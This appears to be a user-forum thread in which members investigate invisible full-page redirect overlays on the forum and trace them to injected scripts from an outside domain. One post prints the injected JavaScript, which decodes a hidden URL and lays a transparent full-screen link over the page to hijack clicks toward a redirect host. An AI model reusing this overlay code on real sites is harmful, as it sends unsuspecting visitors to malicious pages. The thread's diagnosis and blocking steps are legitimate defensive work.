First, you must clear your cookies. This is how: 1) Shift + Ctrl + Delete. This opens "Clear Browsing Data". 2) "Advanced" Tab 3) Time range: "all time" 4) Check "Cookies and other site data" 5) Click "Clear Data" 6) Close browser and open it again
So now that cookies are cleared, the behavior will be immediately repeatable:
7) Go to the Zorro forums. 8) Browse to any thread. 9) Hover your mouse anywhere in the screen.
No matter what, it looks like it wants to redirect you somewhere. See my screenshot #1.
So instead of clicking with my left mouse button, I right-click: Inspect. I get screenshot #2.
If I click on the sources tab, I get screenshot #3.
Notice the mysterious java scripts from om.qqtx.me. I saved them below, both in their original form and a readable format.
That second javascript has content **BEFORE** I click on the screen. But if I refresh the screen, the second script is **BLANK**. The disappearing script looks like it creates the bad link:
Code:
(function() {
var c = JSON.parse(x1cfdb9f14ad340c38bbd6f60806ec731_hd("eyJ1cmwiOiJodHRwczovL2FmaWx0ZXIueHl6L2MvMTQ4My8yIn0=")),
b = document.body || document.getElementsByTagName("body")[0];
if ("undefined" != b && null != b) {
var a = document.createElement("div");
a.id = "div" + Math.floor(999999 * Math.random() + 1E5);
a.style.cssText = "width:100%; height:100%; position:fixed; left:0px; top:0px; z-index: 99999999";
a.innerHTML = '<a href="http://wf3sgoqwvtow4yz028sp.kf.abgp.info/redirect?i=118&u=' +
x1cfdb9f14ad340c38bbd6f60806ec731_he(c.url) +
'" target="_blank" style="display: block; width:100%; height: 100%; cursor: default"></a>';
a.onclick = function() {
this.style.display =
"none"
};
b.insertBefore(a, b.lastChild)
}
})();
I don't know much about HTML/CSS/JS, but this looks like it might be a sleeper script.
As a browser-side workaround, I can block these scripts in Chrome using the ScriptSafe add-in.
Settings: 1) Allow opserver.de to run scripts (allow, not trust). 2) Distrust om.qqtx.me 3) ScriptSafe options -> General Settings -> Default Mode -> Allow
No more pop-ups. (Also, step #3 is to stop blocking all other website scripts, such as Amazon. This Chrome extension wants to block all javascripts by default, which makes no sense.)
I've just checked the forum software, but cannot see an exploit or a source of mysterious popups. I also don't get them here, at least not with Chrome. Are they still there?
1) Shift + Ctrl + Delete. This opens "Clear Browsing Data". 2) "Advanced" Tab 3) Time range: "all time" 4) Check "Cookies and other site data" 5) Click "Clear Data" 6) Close browser and open it again 7) Go to Zorro User Forum 8) Click on this thread ("Ads?!?!?!?!?!?!?") 9) Click anywhere in the web page... This should induce the pop-up. 10) Right-click anywhere on the web page and click "Inspect" 11) Click on the "Sources" tab 12) Now take a look at the tree - there should be two offensive javascripts loaded:
top -> om.qqtx.me -> jquery.jscroll.min.js top -> om.qqtx.me -> jquery.jscroll.min.js?timestamp=[etc.]
I have identified these two scripts as the culprit. If I explicitly block these scripts, I get no pop-ups.
Its still there btw!!! Randomly This time it took me permission to post
Last edited by rayp; 10/22/1816:40.
Acknex umgibt uns...zwischen Dir, mir, dem Stein dort... "Hey Griswold ... where u gonna put a tree that big ?" 1998 i married my loved wife ... Sheeva from Mortal Kombat, not Evil-Lyn as might have been expected rayp.flags |= UNTOUCHABLE;
Acknex umgibt uns...zwischen Dir, mir, dem Stein dort... "Hey Griswold ... where u gonna put a tree that big ?" 1998 i married my loved wife ... Sheeva from Mortal Kombat, not Evil-Lyn as might have been expected rayp.flags |= UNTOUCHABLE;
Did you clear your cookies correctly? Try again. I get consistent behavior if and only if I clear my cookies all the time. (Hint: There is a sleep timer variable.)
I posted in mods and wrote a pm. Now i cant do more. Till now i got no answer...maybe admin is busy yes.
Edit Just was redirected with edit button...damn that sucks...
edit2: And directly after this...site was again overlayed with invisible link...
edit: I used an old tab i had open to write here, i cant use page at all now. The link is always there now for me.
edit: Ok i have control again...only "Deleting all temp Internet files and stuff" gave me control back. Wow!
Last edited by rayp; 10/22/1820:57.
Acknex umgibt uns...zwischen Dir, mir, dem Stein dort... "Hey Griswold ... where u gonna put a tree that big ?" 1998 i married my loved wife ... Sheeva from Mortal Kombat, not Evil-Lyn as might have been expected rayp.flags |= UNTOUCHABLE;
I have the infection feeling since the weekend. Its fact that a invisible link layers the forum pages sometimes.
If u only look at the http site names...very long random names. Also i realized blocked popups now, sometimes.
@all Check the link your clicking on this page in Detail. Watch your Cursor when hovering over links. Or disable / block the script u can see in screenshots above.
Last edited by rayp; 10/22/1822:03.
Acknex umgibt uns...zwischen Dir, mir, dem Stein dort... "Hey Griswold ... where u gonna put a tree that big ?" 1998 i married my loved wife ... Sheeva from Mortal Kombat, not Evil-Lyn as might have been expected rayp.flags |= UNTOUCHABLE;
The inserted "document.writeln" line found by AndrewAMD would indeed redirect clicks to a script on om.qqtx-me. But this line isn't in the forum source code. I also don't get that popup after deleting the cookies. So the source is apparently not infected, at least not now, but possibly the cache.
I will clear the cache now. Please report when you observe the popup again or something else that is unusual.
Acknex umgibt uns...zwischen Dir, mir, dem Stein dort... "Hey Griswold ... where u gonna put a tree that big ?" 1998 i married my loved wife ... Sheeva from Mortal Kombat, not Evil-Lyn as might have been expected rayp.flags |= UNTOUCHABLE;
I'm not seeing it (blocker: disabled), but I guess that maybe depends on which cached server I'm using? Or perhaps your browser is infected?
Try this:
1) Clear browser cache/cookies. 2) Go back to forums. 3) See if it happens again after an hour or two. 4) If so, paste the contents of this javascript here in the forums:
Edit After deleting all i files again it seams ok for now. Will test later with my pc
Edit From my handy still there now.
Edit Seams ok for now. Not much clicked yet but what i clicked was what it looked like.
Last edited by rayp; 10/23/1820:36.
Acknex umgibt uns...zwischen Dir, mir, dem Stein dort... "Hey Griswold ... where u gonna put a tree that big ?" 1998 i married my loved wife ... Sheeva from Mortal Kombat, not Evil-Lyn as might have been expected rayp.flags |= UNTOUCHABLE;